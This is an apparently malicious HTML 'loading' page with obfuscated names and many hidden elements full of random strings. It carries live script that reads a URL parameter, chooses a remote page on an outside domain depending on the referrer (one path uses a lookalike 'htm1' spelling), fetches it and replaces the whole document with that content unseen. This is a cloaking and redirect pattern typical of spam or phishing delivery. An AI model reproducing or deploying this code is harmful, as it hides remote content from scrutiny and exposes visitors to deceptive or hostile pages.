<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .dzG2YnLK7rp {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .dzG2YnLK7rp .qGGovFfJN {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .dzG2YnLK7rp .content {
            line-height: 50px;
            text-align: center
        }

        .dzG2YnLK7rp .img {
            width: 100%
        }

        .dzG2YnLK7rp .kKHSbUDCj {
            text-align: center
        }

        .dzG2YnLK7rp .kKHSbUDCj span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .dzG2YnLK7rp .kKHSbUDCj span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .dzG2YnLK7rp .kKHSbUDCj span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .dzG2YnLK7rp .kKHSbUDCj span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .dzG2YnLK7rp .kKHSbUDCj span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .dzG2YnLK7rp .kKHSbUDCj span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .dzG2YnLK7rp .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function C1oBzGrbin1X(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Dl6P2fW = C1oBzGrbin1X('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Dl6P2fW +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Dl6P2fW +".html?a=share";
		}
		
        ceHksA=url+"#"+new Date().getTime();
        ceHksA && function() {
            $.get(ceHksA, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>BplcZdWo0jGBVknM9HxTyrtQUuaHHGJJvw6RrYiSCe1kOslDGB8OpnJ5iZQkl25mXZMWfYyUF0</div>
<h1 style='display:none' >n4vrrcQb9kf48xDcRAUVpiCCdhnPXfzkf04WC6igdmBDXiYrnz7oZcipudA1HIvrq232Hl</h1>
<span style='display:none'>nO2Dxvr3Vj02ST4bd30oeaApEDAhxHMVeSHArUIFz2F9oyuLZIRThk7dn0PU3qtP6Eg61S6tmlxseRm</span>
<h1 style='display:none' >n4vrrcQb9kf48xDcRAUVpiCCdhnPXfzkf04WC6igdmBDXiYrnz7oZcipudA1HIvrq232Hl</h1>
<img  src='' style='display:none'>
<div style='display:none'>BplcZdWo0jGBVknM9HxTyrtQUuaHHGJJvw6RrYiSCe1kOslDGB8OpnJ5iZQkl25mXZMWfYyUF0</div>
<a  href='#' style='display:none'>FMRyF4SNxIq9hE6LkVZCIOX9LNJbXaT2KGHsPC8JTSPCnb91dPvOJVlok1KJVcddNLGfkUGiE</a>
<span style='display:none'>nO2Dxvr3Vj02ST4bd30oeaApEDAhxHMVeSHArUIFz2F9oyuLZIRThk7dn0PU3qtP6Eg61S6tmlxseRm</span>
<li style='display:none' >I6htDbdCeMtDJZoKiYv81VmO1Gyk6liZef6EU</li><div class="dzG2YnLK7rp">
    <div class="qGGovFfJN">
        <div class="kKHSbUDCj">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >gey8h6nDGJennd9ytd4PwxuBeEYNYjpYPKI2myaCIFHymB9NRLcL4</b>
<span style='display:none'>rNyClj1CGgKdX03UIkeBaJC93n4fMZkM1U84vytK5VEqzs20WhKzWqi1vdSDXFz</span>
<b style='display:none' >gey8h6nDGJennd9ytd4PwxuBeEYNYjpYPKI2myaCIFHymB9NRLcL4</b>
<div style='display:none'>pcutz9uUh3mN9nw6We1VXAS35y9SG4NVQgIHUHHTjY12sk0tq8kIXsSz</div>
<b style='display:none' >gey8h6nDGJennd9ytd4PwxuBeEYNYjpYPKI2myaCIFHymB9NRLcL4</b>
<img  src='' style='display:none'>
<li style='display:none' >UH0j4aQe3j5tZ7rN47AKUgsMHre2mu3Ld1rU5V1evWcbutHHGxqnK7TWSjs30mD6g5</li>
<div style='display:none'>pcutz9uUh3mN9nw6We1VXAS35y9SG4NVQgIHUHHTjY12sk0tq8kIXsSz</div></body>
</html>